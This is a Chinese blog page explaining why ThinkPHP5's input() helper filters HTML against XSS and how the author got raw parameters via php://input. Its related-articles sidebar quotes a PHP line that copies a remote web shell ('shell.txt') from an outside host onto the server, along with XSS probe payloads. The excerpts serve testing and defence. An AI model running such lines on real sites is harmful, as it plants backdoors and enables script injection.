thinkphp5使用input接收参数被自动过滤,如何获取原生参数

最新推荐文章于 2023-08-10 17:41:53 发布
最新推荐文章于 2023-08-10 17:41:53 发布
阅读量951 收藏
点赞数
文章标签: php 安全 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/legender5431/article/details/130146752
版权

文章目录

前言

在使用tp5的input的方法接收参数时,参数内容被过滤,想得到原生的参数

一、为什么被过滤?

thinphp提供了一些默认的安全策略,其中之一是自动过滤 HTML。这种做法是为了防止跨站脚本攻击(Cross-Site Scripting,XSS)。

XSS 攻击是一种常见的网络攻击方式,攻击者通过在网页中插入恶意脚本代码,使得用户在浏览网页时执行这些脚本,从而实现攻击目的,如窃取用户敏感信息、篡改网页内容等。在 PHP 开发中,如果不对用户输入的数据进行合适的处理,就有可能导致 XSS 漏洞的出现。

ThinkPHP 框架通过对用户输入的数据进行自动过滤 HTML 标签,即使用户输入了带有恶意脚本的 HTML 代码,也会被过滤掉,从而减少了 XSS 攻击的风险。这种做法可以帮助开发者在处理用户输入时遵循安全最佳实践,降低了应用被攻击的风险。

二、如何解决

1.一些弯路

开始在网上搜索,并没有找到类似的问题,浪费了一些时间,没有解决问题。

2.解决过程

通过查看input方法的tp源码,发现他是使用file_get_contents(‘php://input’)这个方法来获取原生参数的。

总结

1.不能太依赖搜索,要养成独立思考的能力
2.要善于查看源码,源码看不懂的再去查资料

legender5431
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP使用ajax接收json数据的方法
10-25
主要介绍了ThinkPHP使用ajax接收json数据的方法,包括了前台js代码与对应的PHP处理代码,非常具有实用价值,需要的朋友可以参考下
ThinkPHP采用GET方式获取中文参数查询无结果的解决方法
12-19
例如,ThinkPHP5.x提供了多种请求方式(GET、POST等)和响应方式,可以使用`Route::get()`和`Route::post()`定义路由规则。框架还支持使用`ajax`与`PHP`之间的交互,以及`U`方法加密传递参数等功能。在处理参数时,...
ThinkPHP6中获取参数的3种常用方法【总结】
程序员王雪芹的博客
06-01 6466
ThinkPHP6中获取参数有多种方法,也有很多使用小技巧,很多新手经常知道一种方法,后来在看别人代码的时候又发现第二种、第三种,一头雾水了…… 下面咱们就缕一缕ThinkPHP6中获取参数有多种方法。 我们先假设有以下url: A:http://www.a.com/index/index/hello/id/1.html B:http://www.a.com/index/index/hello?id=1 C:http://www.a.com/index/index/hello?name=12aa D:ht
tp5用户输入过滤解决方案
sunsineq的专栏
08-31 1429
在application下的config.php配置文件中加入默认的过滤方式。 设置htmlspecialchars后,所有的用户输入都会被转换成实体存储到数据库 // 默认全局过滤方法 用逗号分隔多个, 常见的安全过滤函数包括stripslashes(转换反斜杠)、htmlentities(会将中文转换成乱码)、htmlspecialchars(将html标签转换成实体)和strip_tags(过滤掉标签)等 ‘default_filter’ => ‘htmlspecialchars’, 在某些
ThinkPHP内置函数详解D、F、S、C、L、A、I
weixin_33827731的博客
01-19 307
单字母函数D、F、S、C、L、A、I 他们都在ThinkPHP核心的ThinkPHP/Mode/Api/functions.php这个文件中定义. 下面我分别说明一下他们的功能: D() 加载Model类 M() 加载Model类 A() 加载Action类 L() 获取语言定义 C() 获取配置值    用法就是   C("这里填写在配置文件里数组的下标") S() 全局缓存配置 用法S(“这里...
TP5/TP6 input过滤方法常见使用方法
oChuCheng的博客
08-10 1267
开发无小事,作为一名优秀的开发人员,永远不要相信前端页面提交的数据是安全的,只有限定数据提交范围,才能尽可能保证平台安全
TP5 接收表单参数 input
热门推荐
php菜鸟技术天地
09-25 1万+
官方文档:https://www.kancloud.cn/manual/thinkphp5/118044 可以通过Request对象完成全局输入变量的检测、获取安全过滤,支持包括$_GET、$_POST、$_REQUEST、$_SERVER、$_SESSION、$_COOKIE、$_ENV等系统变量,以及文件上传信息。 检测变量是否设置 可以使用has方法来检测一个变量参数是否设置,如
tp5设置参数全局过滤
LordForce的博客
04-02 1276
thinkPHP5设置参数全局过滤
thinkPHP5使用Rabc实现权限管理
10-16
主要介绍了thinkPHP5使用Rabc实现权限管理,需要的朋友可以参考下
thinkphp5敏感词过滤
07-07
ThinkPHP5的敏感词过滤类中,DFA被用来快速地遍历和比对用户输入,判断是否存在敏感词汇。DFA的优势在于其高效的查找速度,尤其对于大量敏感词的情况,性能表现优于其他如正则表达式的方法。 在使用ThinkPHP5的...
Thinkphp5行为使用方法汇总
10-18
下面我们将详细探讨ThinkPHP5中的行为使用方法。 首先,行为的创建位置是在应用或模块的`behavior`目录下。例如,对于`home`模块,我们会在`app/home/behavior`目录中创建一个名为`Test.php`的文件。在这个文件中,...
TP5 使用strip_tags过滤html标签不起作用
xingnang2008的专栏
02-20 1309
TP5 过滤html标签   TP5默认对前端传过来的字符串使用了htmlspecialchars转换为 HTML 实体,因此,我的解决办法是对已经转换的实体进行反转,使用htmlspecialchars_decode()函数即可以实现: $data['post']['content'] = strip_tags(htmlspecialchars_decode($data['post']...
TP5 使用strip_tags过滤html标签不起作用的解决方法
lauwen
01-17 4063
ThinkPHP5中使用strip_tags过滤html标签不起作用的解决办法 在文章保存过程中需要获取前端由Uediter编辑器编辑的html内容中的文本,基本思路是使用PHP自带函数strip_tags()直接过滤 于是直接编辑如下:  $data = $this->request->param(); $data['post']['content'] = strip_...
TP5报错variable type error:array, 无法使用input函数接收数组
miracle
07-08 781
tp5使用input()助手函数接收数组报错variable type error:array. 如下图所示: 报错原因及解决办法:ThinkPHP5.0版本默认的变量修饰符是/s,如果需要传入字符串之外的变量可以使用下面的修饰符,包括: 以上截图至官网:https://blog.csdn.net/haibo0668/article/details/78083642 ...
TP5防sql注入、防xss攻击
baoba84620的专栏
06-15 540
框架默认没有设置任何过滤规则 可以配置文件中设置全局的过滤规则 config.php 配置选项 default_filter 添加以下代码即可 // 默认全局过滤方法 用逗号分隔多个 'default_filter' =&g...
记录一期Thinkphp5 WebShell木马渗透的经历, 加修复建议
DWH的博客
12-26 7961
ThinkPHP的宗旨是简化开发、提高效率、易于扩展,其在对数据库的支持方面已经包括MySQL、MSSQL、Sqlite、PgSQL、 Oracle,以及PDO的支持。ThinkPHP有着丰富的文档和示例,框架的兼容性较强,但是其功能有限,因此更适合用于中小项目的开发。 但是漏洞也层出不穷,有一天发现自己的的小程序突然打不开了, What ??? 小小的网站也被墙了? 之前抱着一种心态 想着 这么小的网站谁想搞你 然后对网络安全方面视而不理,结果有一天 被啪啪打脸!! 当时很惊慌,未了解网络渗透方面的知识
安全攻略】Thinkphp5.0检测上传的文件是否包含木马
美奇软件开发工作室
12-10 4237
一、要做测试,那么肯定是要准备一张带木马的图片文件,制作木马图片的方法: 1、创建一个名为test.php的文件,代码: <?php copy("http://www.zy13.net/shell.txt","robots.php"); ?> test.php里的代码说明: copy(要复制的文件,复制文件的目的地); http://php.123.com/shell.txthttp://www.zy13.net/shell.txt是远程服务器里的一个txt文件,里面.
XSS现代WAF规则探测及绕过技术
专注企业信息安全-sec
09-28 600
初始测试 1、使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等; 2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应; 3、尝试以下的payload <script>alert(1);</script> <script>prompt(1);</script> <
快速开发后台不用太多代码的 tp5_「漏洞分析」ThinkPHP5任意代码执行分析全记录...
weixin_39994438的博客
11-21 388
一 、前言ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的轻量级PHP开发框架,具有免费开源、快速、简单且面向对象等特点。在ThinkPHP的5.*版本中存在安全隐患,由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,可能出现getshell漏洞。受影响的版本包括5.0和5.1。本期安仔课堂,ISEC实验室的黄老师将为大家介绍Think...
thinkphp5开发小程序推广分享带参数二维码生成
最新发布
10-09
ThinkPHP5开发小程序推广分享带参数二维码生成是一种在小程序中推广活动的有效方式。我们可以利用ThinkPHP5框架提供的接口和功能来实现这个需求。 首先,我们需要在小程序中生成一个带参数的二维码。可以使用小程序提供的wx.getSceneParams方法来获取当前页面的参数,并将参数转化为字符串拼接到跳转链接中。然后,使用微信开放平台提供的qr_code接口生成一个带参数的二维码图片,并将图片保存到服务器上。 在ThinkPHP5中,我们可以创建一个二维码生成的控制器,接收前端传来的参数,并根据参数生成二维码。可以使用EasyWeChat等第三方库来调用微信开放平台的接口生成二维码图片。生成的二维码可以保存到服务器上的指定路径。 接下来,我们需要将生成的二维码图片返回给前端。在控制器中,可以使用ThinkPHP5提供的return方法将图片路径返回给前端。前端可以通过路径来展示二维码图片。 最后,我们可以在小程序中实现推广分享的逻辑。在用户点击分享按钮时,可以获取当前页面的路径和参数,并将路径和参数拼接到自定义的分享链接中,生成一个带参数的分享链接。通过这个链接,其他用户进入小程序后,可以通过分享者的分享链接获得参数,从而参与相应的推广活动。 总结来说,使用ThinkPHP5开发小程序推广分享带参数二维码生成,需要在小程序中生成带参数的二维码图片,并利用ThinkPHP5提供的功能将图片保存到服务器上。然后,将生成的二维码图片路径返回给前端展示,并在小程序中实现推广分享的逻辑。这样,我们就可以实现小程序的推广分享功能,带参数二维码的生成和使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值